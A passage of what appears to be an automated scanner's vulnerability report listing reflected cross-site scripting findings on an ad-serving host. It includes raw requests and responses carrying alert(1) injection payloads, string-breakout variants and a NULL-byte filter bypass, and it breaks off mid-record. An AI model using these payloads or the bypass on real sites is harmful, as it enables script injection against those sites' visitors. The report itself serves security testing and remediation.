Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7290
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:04:28 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
86068554;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&958cd"><script>alert(1)</script>ae5fe3e4008=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&958cd">
...[SNIP]...

2.747. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4175b"-alert(1)-"fbc33a3e6c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&4175b"-alert(1)-"fbc33a3e6c8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7217
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:05:00 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
43596920_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&4175b"-alert(1)-"fbc33a3e6c8=1",
clickThruUrl: "http://clk.redcated/go/194153896/direct;wi.120;hi.600;ai.186068554;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.748. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddf79'-alert(1)-'640d3dd2cbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&ddf79'-alert(1)-'640d3dd2cbb=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7219
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:05:29 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
43596920.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&ddf79'-alert(1)-'640d3dd2cbb=1');
}
else
{
_strContentSTW9928343596920 = '<a target="_blank" href="http://clk.atdmt.com/go/194153896/direct;wi.120;hi.600;ai.186068554;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/c
...[SNIP]...

2.749. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The value of the wi.120;hi.600/01/3642846207?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dafa9"-alert(1)-"f8aa8dfd12f was submitted in the wi.120;hi.600/01/3642846207?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=dafa9"-alert(1)-"f8aa8dfd12f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7204
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:03:39 GMT

<html>
<head>
<title>20101008_SH_MC_PWPT_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
549883740_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=dafa9"-alert(1)-"f8aa8dfd12f",
clickThruUrl: "http://clk.redcated/go/194153896/direct;wi.120;hi.600;ai.186068568;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.750. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The value of the wi.120;hi.600/01/3642846207?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa65c'-alert(1)-'0e7901b3e4e was submitted in the wi.120;hi.600/01/3642846207?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=fa65c'-alert(1)-'0e7901b3e4e HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7204
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:04:11 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
343596920.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=fa65c'-alert(1)-'0e7901b3e4e');
}
else
{
_strContentSTW9928343596920 = '<a target="_blank" href="http://clk.atdmt.com/go/194153896/direct;wi.120;hi.600;ai.186068554;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cli
...[SNIP]...

2.751. http://redcated/NYC/iview/194153896/direct [wi.120;hi.600/01/3642846207?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The value of the wi.120;hi.600/01/3642846207?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 426a1"><script>alert(1)</script>51e40ebbddf was submitted in the wi.120;hi.600/01/3642846207?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=426a1"><script>alert(1)</script>51e40ebbddf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7277
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:03:08 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
186068554;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=426a1"><script>alert(1)</script>51e40ebbddf\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=426a1">
...[SNIP]...

2.752. http://redcated/NYC/iview/266460891/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /NYC/iview/266460891/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd5e2'%3bf232180a89 was submitted in the REST URL parameter 4. This input was echoed as fd5e2';f232180a89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/266460891/fd5e2'%3bf232180a89;wi.180;hi.150/01/6646870380?click=http://r1.ace.advertising.com/click/site=0000786606/mnum=0000874959/cstr=10439981=_4ce92672,6646870380,786606^874959^1183^0,1_/xsxdata=$XSXDATA/bnum=10439981/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7217
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:06 GMT

<html>
<head>
<title>20100915_WS_Q3DRE_Feather_v2_180x150_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/AANYCSTRWSTW/Westin_2010/20100915_WS_Q3DRE_Feather_v2_180x150.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/266460891/fd5e2';f232180a89;wi.180;hi.150;ai.182917271;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/266460891/fd5e2';f232180a89;wi.180;hi.150;ai.182917271;ct.1/01" />
...[SNIP]...

2.753. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/266460891/direct

Issue detail

The value of the wi.180;hi.150/01/6646870380?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b07"><script>alert(1)</script>d680b0dfd2 was submitted in the wi.180;hi.150/01/6646870380?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /NYC/iview/266460891/direct;wi.180;hi.150/01/6646870380?click=http://r1.ace.advertising.com/click/site=0000786606/mnum=0000874959/cstr=10439981=_4ce92672,6646870380,786606^874959^1183^0,1_/xsxdata=$XSXDATA/bnum=10439981/optn=64?trg=d0b07"><script>alert(1)</script>d680b0dfd2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 549
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:31 GMT

<iframe src="https://omniture.secure.miisolutions.net/starwoodhotels/1.2/V4/1.2-180x150-shell.html?ct=http://r1.ace.advertising.com/click/site=0000786606/mnum=0000874959/cstr=10439981=_4ce92672,6646870380,786606^874959^1183^0,1_/xsxdata=$XSXDATA/bnum=10439981/optn=64?trg=d0b07"><script>alert(1)</script>d680b0dfd2http://clk.redcated/go/266460891/direct;wi.180;hi.150;ai.185241955;ct.1/01?href=" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" frameborder="0" height="150" sc
...[SNIP]...

2.754. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/266460891/direct

Issue detail

The value of the wi.180;hi.150/01/6646870380?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004ac6b</script><script>alert(1)</script>4c43af75d1d was submitted in the wi.180;hi.150/01/6646870380?click parameter. This input was echoed as 4ac6b</script><script>alert(1)</script>4c43af75d1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /NYC/iview/266460891/direct;wi.180;hi.150/01/6646870380?click=%004ac6b</script><script>alert(1)</script>4c43af75d1d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6560
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:16:26 GMT

<html>
<head>
<title>20100520_WS_BT_40_180x150_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-wid
...[SNIP]...
(navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
   }
}
detectPluginSTW6899393839838();
var _STW6899393839838_Instance =
{
click : "%004ac6b</script><script>alert(1)</script>4c43af75d1d",
clickThruUrl: "http://clk.redcated/go/266460891/direct;wi.180;hi.150;ai.170859177;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.755. http://redcated/NYC/iview/266460891/direct [wi.180;hi.150/01/6646870380?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/266460891/direct

Issue detail

The value of the wi.180;hi.150/01/6646870380?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffb42'-alert(1)-'7f85cf145b1 was submitted in the wi.180;hi.150/01/6646870380?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/266460891/direct;wi.180;hi.150/01/6646870380?click=ffb42'-alert(1)-'7f85cf145b1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6408
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:16:46 GMT

<html>
<head>
<title>20100915_WS_Q3DRE_Feather_v2_180x150_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentSTW7958538833377 = _strContentSTW7958538833377.replace(/!~!click!~!/g,'');
else
_strContentSTW7958538833377 = _strContentSTW7958538833377.replace(/!~!click!~!/g,'ffb42'-alert(1)-'7f85cf145b1');
}
else
{
_strContentSTW7958538833377 = '<a target="_blank" href="http://clk.atdmt.com/go/266460891/direct;wi.180;hi.150;ai.182917271;ct.1/01/" onclick="if(\'ffb42'-alert(1)-'7f85cf145b1\')(n
...[SNIP]...

2.756. http://redcated/NYC/iview/266847915/direct/01/4766470702 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/266847915/direct/01/4766470702

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b3c"><script>alert(1)</script>c0ab4847860 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/266847915/direct/01/4766470702?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000928240/cstr=65895854=_4ce92cd5,4766470702,782102^928240^1183^0,1_/xsxdata=$XSXDATA/bnum=65895854/optn=64?trg=d3b3c"><script>alert(1)</script>c0ab4847860 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 462
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:30:01 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/190025298/266847915/direct/01" onclick="(new Image).src='http://r1.ace.advertising.com/click/site=0000782102/mnum=0000928240/cstr=65895854=_4ce92cd5,4766470702,782102^928240^1183^0,1_/xsxdata=$XSXDATA/bnum=65895854/optn=64?trg=d3b3c"><script>alert(1)</script>c0ab4847860http://t.redcated'">
...[SNIP]...

2.757. http://redcated/NYC/iview/266847915/direct/01/4766470702 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/266847915/direct/01/4766470702

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7072a"><script>alert(1)</script>ce96f4563f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/266847915/direct/01/4766470702?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000928240/cstr=65895854=_4ce92cd5,4766470702,782102^928240^1183^0,1_/xsxdata=$XSXDATA/bnum=65895854/optn=64?trg=&7072a"><script>alert(1)</script>ce96f4563f2=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 465
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:30:02 GMT

